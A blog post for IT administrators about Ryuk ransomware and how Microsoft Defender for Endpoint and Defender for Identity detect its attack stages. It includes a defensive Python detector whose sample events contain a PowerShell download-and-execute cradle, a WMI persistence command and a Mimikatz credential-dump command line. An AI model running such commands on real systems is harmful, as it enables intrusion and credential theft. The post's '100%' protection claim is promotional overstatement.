Hi IT Pros,
As you know, ransomware is in full assault mode at this time of the year 2020. A joint cybersecurity advisory from the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) has just issued a serious warning about the ransomware threat, as shown in the following announcement:
Debuting in August 2018, the Ryuk ransomware gained shocking attention in 2019 when Ryuk gangs demanded multi-million-dollar ransoms from victims, among them companies, hospitals, and local governments. According to the FBI's report, the actors were able to pocket over $61 million in the US alone.
Check Point, a security software vendor, also noted that the gang was attacking an average of 20 companies every week in the third quarter of 2020.
Sean Gallagher from SophosLabs gave us the story of a typical Ryuk and Conti ransomware attack.
Multiple instances of the malicious attachment were detected and blocked. But one employee clicked on the link in the email that afternoon, allowing Outlook to execute "print_document.exe", a malicious executable identified as Buer Loader.
By Wednesday morning the actors had obtained administrative credentials and had connected to the domain controller, where they performed a data dump of Active Directory records.
The data dump to an admin user's directory was most likely accomplished using "SharpHound".
SharpHound is the official data collector for BloodHound. It is written in C# and uses native Windows API functions and LDAP namespace functions to collect data from domain controllers.
Ryuk ransomware was redeployed and relaunched three more times in short order after each failed attempt; no files were encrypted.
Lessons Learned
You may be worried, and wonder how well Microsoft Defender (MD) for Endpoint and MD for Identity can protect your systems from ransomware.
Well, let us put MD to the test. The most trusted industry test is probably AV-TEST from the independent IT-Security Institute in Magdeburg, Germany, known as the owner of the largest malware database in the world: it has counted a total of 1121.95 million malware samples to date (11/27/2020). Every day, the AV-TEST Institute registers over 350,000 new malicious programs (malware) and potentially unwanted applications (PUA).
Test antivirus software for Windows 10 - October 2020 | AV-TEST (av-test.org)
In its Security Report for 2019, AV-Test Lab gave the following conclusion:
… the embedded Windows defense systems proved to be reliable protection against automated mass malware. In the regular certification tests over the past year (2018), Microsoft's consumer product, “Microsoft Defender Antivirus” garnered the AV-TEST rating as “Top Product” five out of six times. Which among other things was due to the reliable detection and defensive performance against widely distributed and frequently occurring malware. The business solution from Microsoft exhibited even better test results in 2019 and was even able to defend the title of “Top Product” in six out of six annual tests.
Microsoft Defender for Endpoint Simulation Attack
Now, let us conduct our own test using the MD for Endpoint Evaluation Lab feature:
With the "known ransomware infection" attack simulation, the following ransomware names are detected and alerted on test machine 1:
Click on WannaCrypt ransomware to show the details about the malicious file named Llac.exe and how long it stayed before being quarantined (3 minutes and 15 seconds):
Click on Petya ransomware to show details of the malicious file named bdata.bin; it existed for only 5 seconds before being quarantined:
The ransomware attack overview and its entities are shown in the tree graph of the incident named “Multi-stage incident involving Initial access & Discovery including Ransomware on multiple Endpoints”:
Ransomware Action | MD for Endpoint and MD for Identity Alert
Malicious services were created on remote servers using the same admin credentials, using a WMI event to drop the command payload. | MD for Endpoint alert: WMI suspicious event
PowerShell is used to download more malicious payloads. | MD for Endpoint alert
Credential theft activity | MD for Identity alert about an overpass-the-hash attack
Impersonation of a privileged account and privileged group membership by PowerShell script. | Alert by MD for Identity, displayed in the Cloud App Security portal
Keyboard hijack activity | Alert by Defender for Endpoint
Fileless attack with in-memory payload. | These activities can be detected by AMSI, Microsoft's Antimalware Scan Interface, when it inspects the in-memory process. MD for Endpoint raised the alert, details as follows.
Mimikatz was used as a credential theft tool. It was detected and blocked from installation, and the Mimikatz files were quarantined. | Alert by MD for Endpoint
Backdoor activity detected | Alerted by MD for Endpoint
Ransomware payload and encryption activities are prevented beforehand. | There is no domain-dominance alert event. There is no encryption alert event.
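To make the detection side of this chain concrete, here is an added example (written for this post, not Microsoft Defender's own detection logic) that runs a handful of behaviour rules over constructed process-creation records modelled on the story above: Outlook launching the dropped print_document.exe, a PowerShell download cradle, the creation of a permanent WMI event consumer, and a Mimikatz command line. Host names, user names, command lines and the rule wording are all made up for the example; only the MITRE ATT&CK technique IDs are the standard ones.

```python
"""Toy endpoint-telemetry detector (added example; not Microsoft's code).

Each record mimics a process-creation event with the few fields an EDR
sensor records. The rules map the steps the post describes onto the
MITRE ATT&CK technique IDs they belong to. All sample records below are
constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record in the shape an EDR sensor typically emits."""
    device: str
    parent: str    # parent image name, lower-case
    image: str     # new process image name, lower-case
    cmdline: str
    user: str


# Constructed sample telemetry modelled on the incident narrative in the post.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "outlook.exe", "print_document.exe",
                 r'"C:\Users\alice\AppData\Local\Temp\print_document.exe"', "alice"),
    ProcessEvent("ws01", "print_document.exe", "powershell.exe",
                 "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/x')", "alice"),
    ProcessEvent("srv02", "powershell.exe", "powershell.exe",
                 "powershell Set-WmiInstance -Namespace root\\subscription "
                 "-Class CommandLineEventConsumer", "admin"),
    ProcessEvent("dc01", "cmd.exe", "mimikatz.exe",
                 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit', "admin"),
    # Benign: a user opening a document from Explorer; should produce no alert.
    ProcessEvent("ws03", "explorer.exe", "winword.exe",
                 '"C:\\Program Files\\Microsoft Office\\winword.exe" report.docx', "bob"),
]

# Mail and Office images that should not be the parent of a freshly dropped .exe.
MAIL_AND_OFFICE = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}

DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|-enc(odedcommand)?\b", re.I)
WMI_SUBSCRIPTION = re.compile(
    r"root\\subscription|commandlineeventconsumer|activescripteventconsumer|__eventfilter", re.I)
CRED_THEFT = re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)

# (rule name, ATT&CK technique, predicate over one event)
RULES = [
    ("Mail/Office application spawned an executable", "T1204.002",
     lambda e: e.parent in MAIL_AND_OFFICE
     and e.image.endswith(".exe") and e.image not in MAIL_AND_OFFICE),
    ("PowerShell download cradle or encoded command", "T1059.001",
     lambda e: e.image == "powershell.exe" and bool(DOWNLOAD_CRADLE.search(e.cmdline))),
    ("Permanent WMI event subscription created", "T1546.003",
     lambda e: bool(WMI_SUBSCRIPTION.search(e.cmdline))),
    ("Mimikatz-style credential theft", "T1003.001",
     lambda e: e.image == "mimikatz.exe" or bool(CRED_THEFT.search(e.cmdline))),
]


def detect(events):
    """Run every rule over every event; return one alert dict per (event, rule) match."""
    alerts = []
    for e in events:
        for name, technique, predicate in RULES:
            if predicate(e):
                alerts.append({"device": e.device, "user": e.user, "image": e.image,
                               "rule": name, "technique": technique})
    return alerts


def devices_by_technique(alerts):
    """Group affected devices by technique, the view an incident graph gives an analyst."""
    grouped = {}
    for a in alerts:
        grouped.setdefault(a["technique"], set()).add(a["device"])
    return grouped


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['device']:5} {a['technique']:10} {a['rule']} ({a['image']})")
```

The point of grouping by technique is that the four alerts on three different hosts describe one intrusion, which is exactly what the "multi-stage incident" tree graph above stitches together; string rules like these are deliberately simple and would sit alongside, not replace, the AMSI and EDR detections the table lists.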
Ryuk Ransomware Prevention and Protection Strategy provided by MD for Endpoint - Threat Analytics
Microsoft Defender for Endpoint Threat Analytics provides an analyst report and a mitigation plan against the Ryuk ransomware. Each attack step in Ryuk's kill chain is mapped to protection measures, which include antivirus/EDR (MD for Endpoint), Azure ATP (MD for Identity), multi-factor authentication (MFA), Attack Surface Reduction rules for Office macros, the Windows host firewall, and the Tamper Protection security policy.
The details of the Ryuk attack based on the MITRE ATT&CK framework are shown in the following image; each ransomware action step of the attack sequence is mapped to one or more countermeasures:
Mitigations provided by MD for Endpoint - Threat Analytics
If security administrators enable EDR and all features of Defender, set up alert notifications, and completely finish all of the Defender for Endpoint and Defender for Identity remediation plans against each ransomware and malware family, then, I guess, our colleagues may sleep much better at night, knowing that their systems are safe and well protected from ransomware and other malware threats.
To get up to the "100%" level of protection, your defense strategy should always include the Windows 10 Defender Guard features (Application Guard, Credential Guard, Exploit Guard with Attack Surface Reduction rules, System Guard, …) together with MD for Endpoint deployed on workstations and servers, and MD for Identity applied to all domain controllers. All of this is part of the defense strategy and included in the M365 E5 license. You may want to check the blog articles related to Microsoft Defender for Identity setup and operation.
I hope the info is useful,
Have a valuable time with your Defender!